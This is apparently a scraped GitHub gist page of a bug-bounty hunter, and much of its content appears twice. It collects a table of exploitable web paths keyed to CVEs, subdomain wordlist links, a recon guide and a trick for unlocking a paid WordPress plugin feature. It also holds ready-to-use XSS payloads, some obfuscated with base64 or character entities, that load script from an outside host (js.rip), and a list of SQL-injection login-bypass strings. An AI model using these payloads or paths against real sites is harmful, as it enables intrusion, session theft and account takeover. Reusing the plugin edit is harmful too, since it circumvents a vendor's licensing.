Halim Jabbes hxlxmjxbbxs

## exploitable_webpaths.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                hxlxmjxbbxs
                / exploitable_webpaths.md
            
            
              Created
              December 30, 2023 04:12
                — forked from kafkaesqu3/exploitable_webpaths.md
            
              
                easy wins - exploitable/leaky web paths
              
          
Exploit/description
Path


Microsoft Office Online Server SSRF (relay)
/op/view.aspx


CVE-2017-11317 CVE-2019-18935
/Telerik.Web.Ui.WebResource.axd?type=rau


CVE-2017-11317 CVE-2019-18935
/Telerik.Web.UI.DialogHandler.aspx


CVE-2020-17519
/jobmanager/logs/


CVE-2017-7615
/verify.php?id=1&confirm_hash=


CVE-2018-1000130
/jolokia


CVE-2018-1000130
/actuator/jolokia


leak
/actuator/env


## subdomain_wordlist.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                hxlxmjxbbxs
                / subdomain_wordlist.md
            
            
              Created
              November 28, 2023 03:37
                — forked from cihanmehmet/subdomain_wordlist.md
            
              
                Subdomain Wordlist
              
          
    ⏳🔺33 Million Subdomain Wordlist🔻🧱🔨👀

https://mega.nz/file/UsJXzITR#TMIFTXnW1zABHfZUIKMPMvA-c8UvzGWeAd4mg4gGCtQ

cmd@fb:/tmp|❯ wc -l 33m-subdomain-wordlist.txt
 33927885 33m-subdomain-wordlist.txt

🚨🔺15 Million Subdomain Wordlist🔻 🧱🔨👀

https://mega.nz/file/BtIh2KaZ#zI1aZgAdHYdBfvKC5G8bwXwfFG11Gx0CW1zLhc0weC8


## m2sms
config:
  from_address: noreply@domain.com

carriers:
  alltel:
    name: Alltel
    value: @message.alltel.com
  ameritech:
    name: Ameritech
    value: @paging.acswireless.com

## allinonemigration.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                hxlxmjxbbxs
                / allinonemigration.md
            
            
              Created
              October 3, 2023 10:23
                — forked from giovanni-d/allinonemigration.md
            
              
                All-in-One WP Migration - Restore From Server (without PRO version) - Restore
              
          
    All-in-One WP Migration Restore From Server (without pro version)

If you don't want to pay for the PRO version of this plugin, and you want to use the "Restore from Server" functionally
that was present in the version 6.77, follow the instructions below:

Open the js file: wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js
On line 1208, replace the code below:

$('.ai1wm-backup-restore').click(function (e) {

  
## CVE-2023-36845.yaml
id: CVE-2023-36845

info:
  name: Juniper Networks Junos OS PHP External Variable Modification Vulnerability
  author: hxlxmj
  severity: medium
  description: |
    A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-36845

## CVE-2023-36845.yaml
id: CVE-2023-36845

info:
  name: Juniper Networks Junos OS PHP External Variable Modification Vulnerability
  author: hxlxmj
  severity: medium
  description: |
    A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-36845

## xss_payloads.txt
"><script src="https://js.rip/t9eoip8zws"></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://js.rip/t9eoip8zws\';document.body.appendChild(a)')
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL3Q5ZW9pcDh6d3MiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus>
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL3Q5ZW9pcDh6d3MiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>
"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL3Q5ZW9pcDh6d3MiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7>
"><iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;&#97;&#114;&#32;&#97;&#61;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#34;&#115;&#99;&#114;&#

## sqli-auth-bypass.txt
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#

## JavascriptRecon.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                hxlxmjxbbxs
                / JavascriptRecon.md
            
            
              Created
              July 21, 2023 06:20
                — forked from fuckup1337/JavascriptRecon.md
            
              
                My Javascript Recon Process - BugBounty
              
          
    Description

This is a simple guide to perform javascript recon in the bugbounty
Steps


The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)


## deobf.cmd
@echo off & setlocal
if "%~1"=="" exit /b
if /i "%~x1" neq ".bat" if /i "%~x1" neq ".cmd" exit /b
<"%~1" ((for /l %%N in (1 1 8) do pause)>nul&findstr "^">"%~n1__%~x1")
Exploit/description	Path
Microsoft Office Online Server SSRF (relay)	/op/view.aspx
CVE-2017-11317 CVE-2019-18935	/Telerik.Web.Ui.WebResource.axd?type=rau
CVE-2017-11317 CVE-2019-18935	/Telerik.Web.UI.DialogHandler.aspx
CVE-2020-17519	/jobmanager/logs/
CVE-2017-7615	/verify.php?id=1&confirm_hash=
CVE-2018-1000130	/jolokia
CVE-2018-1000130	/actuator/jolokia
leak	/actuator/env
	config:
	from_address: noreply@domain.com

	carriers:
	alltel:
	name: Alltel
	value: @message.alltel.com
	ameritech:
	name: Ameritech
	value: @paging.acswireless.com
	id: CVE-2023-36845

	info:
	name: Juniper Networks Junos OS PHP External Variable Modification Vulnerability
	author: hxlxmj
	severity: medium
	description: \|
	A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables.
	reference:
	- https://nvd.nist.gov/vuln/detail/CVE-2023-36845
	"><script src="https://js.rip/t9eoip8zws"></script>
	javascript:eval('var a=document.createElement(\'script\');a.src=\'https://js.rip/t9eoip8zws\';document.body.appendChild(a)')
	"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL3Q5ZW9pcDh6d3MiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus>
	"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL3Q5ZW9pcDh6d3MiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>
	"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL3Q5ZW9pcDh6d3MiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7>
	"><iframe srcdoc="<script>var a=parent.document.createElement("scr&#
	or 1=1
	or 1=1--
	or 1=1#
	or 1=1/*
	admin' --
	admin' #
	admin'/*
	admin' or '1'='1
	admin' or '1'='1'--
	admin' or '1'='1'#
	@echo off & setlocal
	if "%~1"=="" exit /b
	if /i "%~x1" neq ".bat" if /i "%~x1" neq ".cmd" exit /b
	<"%~1" ((for /l %%N in (1 1 8) do pause)>nul&findstr "^">"%~n1__%~x1")